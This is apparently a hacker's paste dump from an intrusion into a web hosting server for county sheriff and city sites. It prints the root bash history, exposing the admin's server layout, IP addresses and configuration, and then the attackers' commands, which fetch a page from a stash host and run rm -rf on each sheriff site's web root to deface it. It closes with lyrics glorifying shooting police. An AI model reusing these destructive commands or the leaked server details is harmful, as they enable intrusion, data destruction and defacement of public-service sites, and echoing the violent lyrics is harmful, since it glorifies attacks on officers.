- apache 29617 0.0 0.0 2548 984 ? S 16:00 0:00 sh -c w;ps -aux
- apache 29620 0.0 0.0 2276 824 ? R 16:00 0:00 ps -aux
- root 30158 0.0 0.1 12136 3224 ? Ss Jul29 0:03 sshd:
- root@pts/1
- root 30168 0.0 0.0 4748 1536 pts/1 Ss+ Jul29 0:00 -bash
- // LETS SEE HOW THEY ATTEMPTED TO SECURE THEIR NEW SERVER...
- # cat ~root/.bash_history
- ifconfig
- ping 10.0.0.1
- ping 10.0.0.254
- service sshd status
- service network restart
- service sshd restart
- service iptables restart
- service iptables stop
- service iptables start
- exit
- service iptables stop
- service psa start
- service psa status
- netstat -anp | less
- tcpdump not port ssh
- yum update -y
- date
- pwd
- mkdir htmldoc
- wget
- http://www.htmldoc.org/software.php?VERSION=1.8.27&FILE=htmldoc/1.8.27/htmldoc-1
- .8.27-source.tar.gz
- ls
- rm software.php\?VERSION\=1.8.27
- cd htmldoc/
- wget http://ftp.easysw.com/pub/htmldoc/1.8.27/htmldoc-1.8.27-source.tar.gz
- gunzip htmldoc-1.8.27-source.tar.gz
- tar -xvf htmldoc-1.8.27-source.tar
- cd htmldoc-1.8.27
- ./configure
- yum install gcc-c++
- make
- make install
- cd ..
- cd ..
- mkdir ImageMagick
- yum install tcl-devel libpng-devel libjpg-devel ghostscript-devel bzip2-devel
- freetype-devel libtiff-devel
- pwd
- cd ImageMagick/
- wget ftp://ftp.imagemagick.org/pub/ImageMagick/ImageMagick.tar.gz
- tar -xzvf ImageMagick.tar.gz
- cd ImageMagick-6.7.1-0/
- ls
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- yum install java-1.6.0-openjdk-devel.i386
- cd /usr/src/
- ls
- wget http://www.pdflib.com/binaries/PDFlib/705/PDFlib-Lite-7.0.5.tar.gz
- tar -xzpf PDFlib-Lite-7.0.5.tar.gz
- cd PDFlib-Lite-7.0.5
- ls
- ./configure -prefix=/usr/local
- make
- make install
- yum install php-pear
- pecl install pdflib
- cp /usr/local/lib/libpdf.so /usr/include/php/ext
- echo "[libpdf]" >> /etc/php.ini
- echo "extension=pdf.so" >> /etc/php.ini
- service httpd restart
- cd /etc
- ls php.ini
- vi php.ini
- vi php.ini
- service httpd restart
- cd
- cd ImageMagick/
- ls
- cd ImageMagick
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- ls
- cd ImageMagick-6.7.1-0/
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- yum install libjpeg-devel
- yum install tcl-devel
- yum install libpng-devel
- yum install ghostscript-devel
- yum install bzip2-devel
- yum install freetype-devel
- yum install libtiff-devel
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- make clean
- make
- make install
- cd .ssh/
- ll
- chown root:root authorized_keys2
- vi /etc/my.cnf
- service mysqld restart
- pkill mysql
- service mysqld restart
- ps -ef | grep my
- vi /etc/my.cnf
- service mysqld start
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- ifconfig -a
- vi mapfile
- ifconfig -a
- /usr/local/psa/bin/reconfigurator.pl mapfile
- mv mapfile mapfile.old
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- mv mapfile mapfile88
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- ll
- cat mapfile.old
- /usr/local/psa/bin/reconfigurator.pl mapfile.old
- vi mapfile.old
- /usr/local/psa/bin/reconfigurator.pl mapfile.old
- vi mapfile.old
- vi mapfile.old
- ls
- ifconfig -a
- ifconfig -a
- rm mapfile
- /usr/local/psa/bin/reconfigurator.pl mapfile.old
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- ls /etc/sysconfig/network-scripts/
- cd /etc/sysconfig/network-scripts/
- ls
- ls
- less ifcfg-eth0
- cd
- ls
- finder.pl /var/www/vhosts/
- finder.pl /var/www/vhosts/
- find /var/www/vhosts/
- less /var/log/rkhunter.log
- cd
- cd /var/www/vhosts/cityofgassville.org/
- ls
- cd httpsdocs/
- ls
- less index.html
- cd
- cd /var/www/vhosts/mostwantedwebsites.net/
- ll
- cd httpdocs/
- ls
- ll
- mkdir ../old
- mv access_log.processed _bak/ csv_for_lead_hill_change_log.php test/ ../old/
- ll
- telnet mail.cityofgassville.com 25
- ssh 173.201.44.1
- cd /var/www/vhosts/
- ls
- cd default/
- ll
- cd htdocs/
- ll
- vi index.html
- vi .htaccess
- cd ..
- cd ..
- ls
- cd mostwantedgovernmentwebsites.com
- ll
- cd httpdocs/
- ll
- find . -name \*bak\*
- find . -perm 777 -ls
- chown apache:apache ./uploads
- chmod 1755 uploads/
- ls admin
- find . -perm 777 -type f -exec chmod 644 {} \; -ls
- find uploads/ -ls
- ls
- ll
- ll api
- less api/index.php
- mkdir ../old
- find . -name \*bak\*
- find . -name \*bak\* -exec mv -vb {} ../old/ \;
- find . -name \*bak\*
- ls
- ll
- cd /var/www/vhosts/
- ls
- cd default/
- ll -a
- cd htdocs/
- ll
- vi .htaccess
- service httpd restart
- vi .htaccess
- service httpd restart
- ls
- ll
- tcpdump port 80
- tcpdump port 80 -n
- tcpdump port 80
- tcpdump port 80 -s 1500
- tcpdump port 80 -s 1500 -A
- tcpdump port 80 -s 1500 -A| less
- cd ../../
- cd mostwantedgovernmentwebsites.com/
- cd httpdocs/
- vi index.htm
- cd ../..
- cd ../
- cd -
- ls
- cd mostwantedwebsites.net/
- cd httpdocs/
- vi index.htm
- less ../statistics/logs/access_log
- ls
- pwd
- pwd
- cd ../../
- ls
- cd mostwantedgovernmentwebsites.com
- ls
- ll
- cd httpdocs/
- ll
- vi index.htm
- mv index.htm index.htm_bak
- vi index.htm
- less ../statistics/logs/access_log
- ls
- mv index.htm_bak index.htm
- cd ../../
- ls
- cd mostwantedwebsites.net/
- ls
- cd httpdocs/
- ls
- mv index.htm index.htm_bak
- mv index.htm_bak index.htm
- service httpd restart
- pwd
- less index.htm
- pwd
- pwd
- mv index.htm index.htm_bak
- ls
- cp case_study.htm index.htm
- less index.htm
- pwd
- mv index.htm_bak index.htm
- cd ..
- cd ..
- cd default/
- ll
- cd htdocs/
- vi .htaccess
- yum install jp2-devel
- yum list | less
- yum list | less
- yum install fontconfig-devel
- wget http://www.ipchicken.com -O /dev/stdout | less
- ssh 97.74.115.143
- ssh 97.74.115.143
- ssh 97.74.115.143
- cd /var/www/vhosts/
- ls
- cd baxtercountysheriff.com/
- less statistics/logs/access_log
- ls
- find . -ls | less
- find . -ls | less
- less httpsdocs/array_o_files.php
- ll httpsdocs/array_o_files.php
- find . -ls | less
- find . -type f -exec grep passthru {} \;
- find . -type f -exec grep passthru {} \; -print
- find . -ls | less
- find . -ls | mail -s 'Files' jwiegand@bjmweb.com
- mailq
- vi /etc/postfix/main.cf
- postfix reload
- postqueue -f
- mailq
- mailq
- mailq
- mailq
- mailq
- mailq
- telnet 208.109.80.210 25
- postqueue -f
- ls
- find . -ls | less
- mailq
- less /usr/bin/GET
- less /sbin/ifup
- cd
- ls
- finder.pl /
- cd /var/www/vhosts/
- ls
- cd boonesheriff.com/
- find . -ls | less
- rm -rf cgi-bin/
- find . -ls | less
- less httpdocs/home/check_population.php
- find . -ls | less
- cd httpsdocs/
- ls
- rm -rf test
- cd ../..
- ls
- cd cityofgassville.org/
- find . -ls | less
- cd httpdocs/
- ll
- chmod 755 ajax controllers model settings views
- ll
- find . -ls
- ls
- cd views
- ll
- chmod 755 *
- find . -mode 777
- find . -perms 777
- find . -perm 777
- find . -perm 777 -ls
- find . -perm 777 -type f
- find . -perm 777 -type f -ls
- find . -perm 777 -type f -exec chmod 644 {} \;
- find . -ls
- find . -perm 777 -type d -exec chmod 755 {} \;
- ll
- cd ..
- find . -perm 777 -ls
- ls
- ll
- find . -perm 777 -type d -exec chmod 755 {} \;
- find . -perm 777 -type f -exec chmod 644 {} \;
- ll
- cd ../..
- ll
- cd boonesheriff.com/
- ll
- find . -ls | less
- find . -ls | less
- find . -perm 777
- find . -perm 777 -ls
- cd httpdocs/uploads/
- ll
- find . -perm 777 -ls
- find . -perm 777 -ls -type f
- find . -perm 777 -ls -type f -exec chmod 644 {} \;
- find . -perm 777 -type f -exec chmod 644 {} \;
- find -ls
- cd ..
- cd ..
- find . -perm 777
- find httpdocs -perm 777
- find httpdocs -perm 777 -ls
- chmod 755 httpdocs/admin/modules httpdocs/admin/modules/basic_page_editor
- httpdocs/admin/modules/most_wanted
- httpdocs/admin/modules/most_wanted/wanted_arrested
- httpdocs/admin/modules/press_releases httpdocs/admin/modules/sex_offenders
- httpdocs/config
- chmod 755 httpdocs/high_res httpdocs/images/inmates httpdocs/images/warrants
- httpdocs/uploads
- find httpdocs -perm 777 -ls
- chmod 644 httpdocs/config/injection_patch.php httpdocs/config/header.php
- httpdocs/cross_inmate.php
- cd ..
- ls
- find . -perm 777 -ls
- ls
- cd cityofgassville.org/
- find . -perm 777 -ls
- ;ll
- ll
- cd httpdocs/
- less core/master.tps
- ll
- less core/master.tps
- chmod 777 helpers
- chmod 777 core
- chmod 755 core
- chmod -R 777 core
- chmod -R 777 helpers
- ll
- chmod -R 777 core
- vi phpinfo.php
- rm phpinfo.php
- find core -ls
- less core/ini.tps
- find . sqlite_open
- find . -exec grep sqlite_open {} \;
- yum list | less
- vi phpinfo.php
- rm phpinfo.php
- cd /tmp
- rpm -ivh sqlite2-2.8.17-5.el5.i386.rpm
- service httpd restart
- yum install php-sqlite
- yum install php5-sqlite
- pec install sqlite
- pecl install sqlite
- pecl install sqlite2
- pecl install sqlite3
- pecl info sqlite
- pear install sqlite
- cd
- pecl download sqlite
- mkdir sl
- cd sl/
- tar -zxvf ../SQLite-1.0.3.tgz
- wget http://www.modphp.org/src/sqlite-1.0.3-byref_patch-1.0.patch
- less sqlite-1.0.3-byref_patch-1.0.patch
- patch -p1 < sqlite-1.0.3-byref_patch-1.0.patch
- tar -czf ../SQLite-1.0.3.tgz .
- pecl install SQLite-1.0.3.tgz
- service httpd restart
- vi /etc/php.d/pdo_sqlite.ini
- ll /var/tmp/pear-build-root/SQLite-1.0.3/modules
- cd /etc/php/d
- cd /etc/php.d
- ls
- cp pdo_sqlite.ini sqlite.ini
- vi sqlite.ini
- service httpd restart
- pwd
- cat sqlite.ini
- vi /etc/php.ini
- cd
- cd /var/www//vhosts/cityofgassville.org/
- ls
- cd httpdocs/
- ls
- ll
- less header.tps
- find . -perm 777 -ls
- find . -perm 777 -type f -exec chmod 644 {} \;
- find . -perm 777 -type d -exec chmod 755 {} \;
- ll
- cd ..
- cd ..
- ll
- cd kempercountysheriff.com/
- ls
- ll
- cd http
- cd httpdocs/
- ll
- find . -ls | less
- rm -rf test/
- ll
- find . -ls | less
- ls admin/
- cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess .
- vi .htaccess
- find . -ls | less
- ll
- chown 755 uploads high_res/
- chown apache:apache uploads high_res/
- chmod 1755 uploads high_res/
- ll
- find . -perm 777
- less ./uploads/watermark_wanted_photo.php
- ll ./uploads/watermark_wanted_photo.php
- chmod 644 ./uploads/watermark_wanted_photo.php
- chmod 644 ./uploads/arrested_big.png
- rm -f ./uploads/Thumbs.db
- cd ..
- cd ..
- ll
- cd marioncountysheriffar.com/
- find . -perm 777
- cd httpdocs/
- ll
- ls test
- rm -rf test
- chown apache:apache uploads/ high_res/
- chmod 1755 uploads/ high_res/
- cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess admin/
- vi admin/.htaccess
- ls
- ls ../../boonesheriff.com/httpdocs/admin/
- ll ../../boonesheriff.com/httpdocs/admin/
- cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess
- ../../boonesheriff.com/httpdocs/admin/
- ll -a ../../boonesheriff.com/httpdocs/admin/
- pwd
- find . -ls | less
- rm Thumbs.db
- ll admin/
- ll -a admin/
- cd ../../
- ll
- finder.pl .
- vi ~/bin/finder.pl
- finder.pl .
- vi ~/bin/finder.pl
- finder.pl .
- vi ~/bin/finder.pl
- finder.pl .
- vi ~/bin/finder.pl +16
- finder.pl .
- vi ~/bin/finder.pl +16
- cd baxtercountysheriff.com/
- find . -ls | less
- cd httpdocs/
- ls
- pwd
- ls test
- pwd
- mv test ..
- ls
- ll
- chown apache:apache high_res/ uploads/
- chmod 755 high_res/ uploads/
- ll
- chmod 1755 high_res/ uploads/
- ll
- ll config
- find . -perm 777
- find . -perm 777 -type f
- find . -perm 777 -type f -ls | less
- ll
- ps -ef | grep http
- find . -perm 777 -type f -ls -exec chmod 644 {} \;
- find . -perm 777 -type f -ls -exec chmod 644 {} \;
- ll
- find . -perm 777 -type d
- find . -perm 777 -type d -ls
- find . -perm 777 -type d -ls| less
- find admin -perm 777 -type d -exec chmod 755 {} \;
- find . -perm 777 -type d -ls| less
- find admin_dymin/ -perm 777 -type d -exec chmod 755 {} \;
- find . -perm 777 -type d -ls| less
- find blog config/ -perm 777 -type d -exec chmod 755 {} \;
- find . -perm 777 -type d -ls| less
- find uploads/ -perm 777 -type d -exec chmod 755 {} \;
- ls
- find . -perm 777 -type d -ls| less
- cd images/
- ll
- ls warrants/
- ll warrants/
- ls
- find . -perm 777 -type d -ls
- yum install mcrypt
- yum install php-mcrypt
- service httpd restart
- ll
- chown apache:apache warrants/ inmates/
- chmod 1755 warrants/ inmates/
- ll
- cd
- mv ~bjmsuper/id_dsa.pub .ssh/authorized_keys2
- vi /etc/ssh/sshd_config
- nohup service sshd restart
- cd
- cd .ssh/
- ll
- crontab -e
- /usr/sbin/ntpdate nist1-chi.ustiming.org
- crontab -l
- vi /etc/rsnapshot.exclude
- crontab -e
- /usr/sbin/ntpdate nist1-chi.ustiming.org 2&>1 >/dev/null
- cd
- cd /var/www/vhosts/
- cd marioncountysheriffar.com/
- ll
- cd httpdocs/
- ll
- cd ../../kempercountysheriff.com/
- ll
- cd httpdocs/
- ll
- ll -a admin/
- cd ..
- cd ..
- find . -name .htaccess
- cp ./marioncountysheriffar.com/httpdocs/admin/.htaccess
- kempercountysheriff.com/httpdocs/admin/
- vi kempercountysheriff.com/httpdocs/admin/.htaccess
- cd /var/www/vhosts/baxtercountysheriff.com/cd admin
- cd /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin
- vi .htaccess
- exit
- passwd bjmsuper
- mailq
- openssl s_client -connect mostwantedwebsites.net:993 -ssl2
- openssl s_client -connect localhost.net:993 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:465 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:465
- openssl s_client -connect mail.mostwantedwebsites.net:993 -sslv
- openssl s_client -connect mail.mostwantedwebsites.net:993 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:995 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- ping mail.mostwantedwebsites.net
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:993 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:995 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- vi /etc/httpd/conf.d/ssl.conf
- restart httpd
- /etc/init.d/httpd restart
- vi /etc/courier-imap/imapd-ssl
- vi /etc/courier-imap/pop3d-ssl
- /etc/init.d/courier-imap restart
- openssl s_client -connect mail.mostwantedwebsites.net:465 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:465
- openssl s_client -connect mail.mostwantedwebsites.net:25
- add user bcsd_sync
- adduser bcsd_sync
- passwd bcsd_sync
- cd /var/www/vhosts/baxtercountysheriff.com/
- ls
- mkdir home
- ls /home
- ll /home
- rm home
- rm home -rf
- ll
- mv /home/bcsd_sync/ ./home
- ll
- vi /etc/passwd
- chown bcsd_sync:psacln home
- chmod 740 home
- ll
- exit
- cd /var/www/vhosts/adamscosheriff.org/httpdocs/
- ll
- find . -type d -exec chmod 0755 {} \;
- find . -type f -exec chmod 0644 {} \;
- ll
- chown -R apache:apache settings/ uploads/
- ll
- chmod -R 1755 settings/ uploads/
- ll
- cd /var/www/vhosts/sgcso.com/httpdocs/
- ll
- find . -type d -exec chmod 0755 {} \;
- find . -type f -exec chmod 0644 {} \;
- ll
- chown -R apache:apache uploads/ high_res/
- chmod -R 1755 uploads/ high_res/
- ll
- cd admin
- ll
- ll -a
- vi .htaccess
- ll -a
- cd /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/
- ll
- find . -type d -exec chmod 0755 {} \;
- find . -type f -exec chmod 0644 {} \;
- chmod -R 1755 uploads/ high_res/
- chown -R apache:apache uploads/ high_res/
- ll
- cd admin/
- ll
- ll -a
- cd /var/www/vhosts/crosscountysheriff.org/
- cd httpdocs/
- ll
- cd admin/
- ll
- cd config/
- ll
- less connect.php
- vi connect.php
- vi connect.php
- cd /var/www/vhosts/polkcountymosheriff.org/httpdocs/
- ll
- ll
- cd /var/www/vhosts/marioncountysheriffar.com/httpdocs/
- ll
- cd /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/
- ll
- // THIS TIME WE'RE NOT GONNA HESITATE TO PULL THE TRIGGER.
- # wget http://our.sekret.stash/index.html
- # rm -rf /var/www/vhosts/adamscosheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/adamscosheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/*; cp index.html
- /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/;
- # rm -rf /var/www/vhosts/baxtercountysheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/boonesheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/boonesheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/cityofgassville.org/httpdocs/*; cp index.html
- /var/www/vhosts/cityofgassville.org/httpdocs/;
- # rm -rf /var/www/vhosts/crosscountysheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/crosscountysheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/drewcountysheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/drewcountysheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/grantcountysheriff-collector.com/httpdocs/*; cp
- index.html /var/www/vhosts/grantcountysheriff-collector.com/httpdocs/;
- # rm -rf /var/www/vhosts/hodgemansheriff.us/httpdocs/*; cp index.html
- /var/www/vhosts/hodgemansheriff.us/httpdocs/;
- # rm -rf /var/www/vhosts/izardcountyar.org/httpdocs/*; cp index.html
- /var/www/vhosts/izardcountyar.org/httpdocs/;
- # rm -rf /var/www/vhosts/izardcountysheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/izardcountysheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/jocomosheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/jocomosheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/kempercountysheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/kempercountysheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/lawrencecosheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/lawrencecosheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/lcsdmo.com/httpdocs/*; cp index.html
- /var/www/vhosts/lcsdmo.com/httpdocs/;
- # rm -rf /var/www/vhosts/marioncountysheriffar.com/httpdocs/*; cp index.html
- /var/www/vhosts/marioncountysheriffar.com/httpdocs/;
- # rm -rf /var/www/vhosts/mcminncountysheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/mcminncountysheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/mostwantedgovernmentwebsites.com/httpdocs/*; cp
- index.html /var/www/vhosts/mostwantedgovernmentwebsites.com/httpdocs/;
- # rm -rf /var/www/vhosts/mostwantedwebsites.net/httpdocs/*; cp index.html
- /var/www/vhosts/mostwantedwebsites.net/httpdocs/;
- # rm -rf /var/www/vhosts/newtoncountysheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/newtoncountysheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/polkcountymosheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/polkcountymosheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/rcpi-ca.org/httpdocs/*; cp index.html
- /var/www/vhosts/rcpi-ca.org/httpdocs/;
- # rm -rf /var/www/vhosts/sgcso.com/httpdocs/*; cp index.html
- /var/www/vhosts/sgcso.com/httpdocs/;
- # rm -rf /var/www/vhosts/stonecountymosheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/stonecountymosheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/vbcso.com/httpdocs/*; cp index.html
- /var/www/vhosts/vbcso.com/httpdocs/";
- // I take a left at the light, turn off the headlights and ride real slow
- // Now holla at me when you see the 5-0
- // Alright Dirty, yall boys ready?
- // Bout to turn drive-bys revolutionary
- // *POW POW POW POW POW* YEAH MUTHAFUCKA YEAH!
- // *POW POW POW POW POW* YEAH MUTHAFUCKA YEAH!
- // Look at 'em run, too scared to pull they guns
- // Outta shape from them coffees and them cinnamon buns
- // This shit is fun, how I feel when the tables is turned
- // Hollow tips hit yah flesh through yo vests and it burn
- // That's a lesson you learn, comin straight from the slums
- // And it don't stop till we get full freedom
Add Comment
Please, Sign In to add comment